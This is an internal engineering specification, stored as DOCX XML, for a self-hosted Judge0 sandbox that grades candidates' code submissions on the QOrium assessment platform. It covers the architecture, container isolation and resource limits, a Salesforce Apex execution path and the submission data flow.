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udge0-sandbox-integration-spec-v0"/>
      <w:r>
        <w:t xml:space="preserve">Judge0 Sandbox Integration Spec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CTO-Office v0 working spec. Engineering review pending Senior Engineer #1 hire. Code-question execution backbone for QOrium ReadyBank + JD-Forge + Stack-Vault SKUs.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CTO Office, Talpro Universe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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Scope:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Phase 1 (M1–M3); code-execution sandbox for ~25 coding questions in Wave 1; scales to 1,000+ by M3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Companion Docs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">07-CTO-Architecture-v1.md (§2.2, §4), Anti-Leak-Engine-v0-Design.md (watermarking), Wave-1-Seed-Batch-100-Questions-Master.md (question inventory)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§ 1 Purpose</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">QOrium’s content engine produces 160+ questions across 8 technical roles in Wave 1 (May 2026 target). Approximately 25 of these 160 items are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">code-execution questions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(coding-fn, coding-project formats) that require sandboxed execution to grade candidate submissions accurately. By Month 3, this scales to 1,000+ code questions across ReadyBank, JD-Forge, and Stack-Vault SKUs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="problem"/>
      <w:r>
        <w:t xml:space="preserve">Problem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional question types (MCQ, design, case-study, SJT) can be scored deterministically via rubric comparison. Code questions demand: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Automated test execution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Run candidate’s code against reference test cases; pass/fail per test.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Execution metadata capture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— stdout/stderr, exit code, runtime, memory usage, timeout detection.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isolation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Prevent candidate code from escaping sandbox or harming host.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Multi-language support</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Java, Python, Node/TS, C++, Rust, Go, SQL, Bash, Apex (special case).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Per-candidate variant execution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Watermarked variants (Stack-Vault) use deterministic test-case seeds; sandbox must respect them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="solution"/>
      <w:r>
        <w:t xml:space="preserve">Solution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two-tier sandbox architecture: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General-purpose (Judge0):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Self-hosted open-source Judge0 v1.13+ on Mac Mini M4 Pro. Supports Java, Python, Node.js, TypeScript (via tsx), C++, Rust, Go, C, SQL (Postgres via psql), Bash, Shell/AWK — 12 languages baseline.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Apex-specific (Salesforce CLI):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Salesforce Platform CLI on developer org because Judge0 does not support Apex execution.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Optional fallback (WebContainer):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">StackBlitz embedded for preview-only browser-side execution (non-graded, non-persistent).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"/>
      <w:r>
        <w:t xml:space="preserve">§ 2 Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="system-diagram"/>
      <w:r>
        <w:t xml:space="preserve">2.1 System Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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QOrium Express API (VPS)                                       │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  POST /v1/submissions  ← Candidate submits code                 │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  GET  /v1/submissions/{id}  ← Poll execution result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┌──────────▼──────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          │ Redis queue         │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          │ (pending jobs)      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">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qorium-judge0-orchestrator (PM2, fork mode)   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          │ 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          │ Dequeue job                                   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          │ Route: Judge0 (general) | Apex CLI (Apex)     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          │ Poll execution → collect results              │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          │ Score vs rubric                               │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          │ Persist to PostgreSQL                         │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          └────────┬───────────────────┬─────────────────┘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│                   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      ┌────────────▼─────┐   ┌─────────▼──────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      │ Judge0 on Mac    │   │ Salesforce         │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      │ Mini M4 Pro      │   │ Developer Org      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      │ (Docker)         │   │ (Platform CLI)     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      │ 12 languages     │   │ Apex execution     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      │ Network: none    │   │ Governor limits    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      │ Filesystem: RO   │   │ ~5K execs/day cap  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      │ Resource limits: │   └────────────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      │  cgroups v2      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">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PostgreSQL (VPS)                                                │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│ content.questions — sandbox_config JSONB                        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│ content.responses — execution_metadata JSONB                    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│ content.leak_signals — enhanced with execution data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6" w:name="components"/>
      <w:r>
        <w:t xml:space="preserve">2.2 Components</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="pm2-service-qorium-judge0-orchestrator"/>
      <w:r>
        <w:t xml:space="preserve">PM2 Service:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qorium-judge0-orchestrator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Process mode:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fork (stateful, single instance; manages queue, worker pool).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Port:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5,108 (internal healthcheck only; not exposed via Nginx).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Responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dequeue submission jobs from Redis (BullMQ queue).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Route by language: Judge0 (Java, Python, Node, etc.) vs Apex CLI (Apex).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manage timeout, retry, and failure logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Poll Judge0 API or Salesforce CLI for execution results.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Score result against test-case rubric.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Persist execution_metadata to content.responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Re-queue failed items up to 3 retries (exponential backoff).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alert on-call if queue depth exceeds 100 pending jobs (Page via Talpro Sentinel).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="judge0-self-hosted-mac-mini-m4-pro"/>
      <w:r>
        <w:t xml:space="preserve">Judge0 Self-Hosted (Mac Mini M4 Pro)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure choice rationale: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Self-hosted on Mac Mini (not VPS):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Judge0 is GPL-3 licensed. Talpro Constitution SO-26 (§Legal) mandates open-source license compliance. Self-hosting on Mac Mini (not a commercial cloud VPS) avoids licensing ambiguity. Equivalent: Ollama-on-Mac pattern (CTO Architecture §2.2).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Mac Mini M4 Pro specs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">16GB RAM, 12-core CPU, 1TB SSD. Capable of 50+ concurrent Docker containers for sandboxing. Well-suited for 3,000 sandbox executions/day spread across business hours.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Docker deployment:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Judge0 v1.13+ containerized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Includes Judge0 server, PostgreSQL backing store, Redis for caching.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Network isolation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Judge0 containers run with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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">after compilation phase; no outbound network access. Prevents exfiltration.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Filesystem isolation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Read-only rootfs; tmpfs-backed /tmp per container; no host volume mounts except artifact staging.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Resource limits (cgroups v2):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CPU: 1 core per sandbox (12-core host ÷ 12 concurrent max).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory: per-language cap (see § 5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OOM kill: If container exceeds memory limit, Docker kills container; orchestrator treats as test-fail (not whole-worker crash).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Connectivity: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Reverse tunnel (Tailscale):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mac Mini connects via Tailscale to VPS. Judge0 API accessible at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">judge0.ts.net:2358</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(internal Tailscale network).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Failover:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">If Tailscale blips, orchestrator auto-queues job for retry (max 3 retries, exponential backoff 1s → 5s → 15s).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="salesforce-apex-sandbox-developer-org"/>
      <w:r>
        <w:t xml:space="preserve">Salesforce Apex Sandbox (Developer Org)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why separate from Judge0:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Judge0 does not support Apex execution (Salesforce-proprietary). Solution: leverage Salesforce Platform CLI (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sfdx force:apex:execute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">command via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">executeAnonymous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Setup: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Org shape:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Free Salesforce developer edition (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">org-shape-developer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); cost = $0.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Capacity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">~5,000 Apex executions/day (Salesforce governor limits; tested empirically).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Rate limiting:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Token-bucket limiter (1 req/sec max); queue excess requests.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Org rotation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">After 1,000 executions, provision fresh org (orgs accumulate metadata bloat; fresh org = cleaner state for testing).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Test org creation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Automated via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sfdx force:org:create --definitionfile config/project-scratch-org-def.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(idempotent; CI/CD controlled).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="Xea96f059539b33a01cba82c54e5a8d3095ce5e6"/>
      <w:r>
        <w:t xml:space="preserve">Optional Fallback: WebContainer (StackBlitz)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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Preview-only, non-graded browser execution for JavaScript/TypeScript code questions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Use case:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Candidate wants to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">run the code in my browser to see output before submitting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(UX convenience, not grading source-of-truth).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Properties:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Embedded StackBlitz iframe in QOrium web frontend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No persistence; output not sent to server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Not used for scoring or anti-leak forensics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deferred to Phase 1 M2 (not critical for Wave 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ata-flow"/>
      <w:r>
        <w:t xml:space="preserve">§ 3 Data Flow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="submission-execution"/>
      <w:r>
        <w:t xml:space="preserve">3.1 Submission → Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Candidate submits code via QOrium web frontend</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   POST /api/v1/responses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"question_id": "qor-java-001",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "language": "java21",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "code_submission": "&lt;candidate code&gt;",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "submitted_at": "2026-05-03T10:15:00Z"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API validates:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Question exists &amp; released</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Language supported</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Code &lt; 50KB (arbitrary limit)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Candidate.submitted_at &lt; deadline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Create content.responses record (status='pending')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"id": "uuid",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "question_id": "qor-java-001",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "tenant_id": "&lt;customer&gt;",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "candidate_id": "external_id_xyz",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "response_body": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       "code": "&lt;candidate code&gt;",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       "language": "java21"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "score": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "time_taken_ms": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     "suspicious_signals": {},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
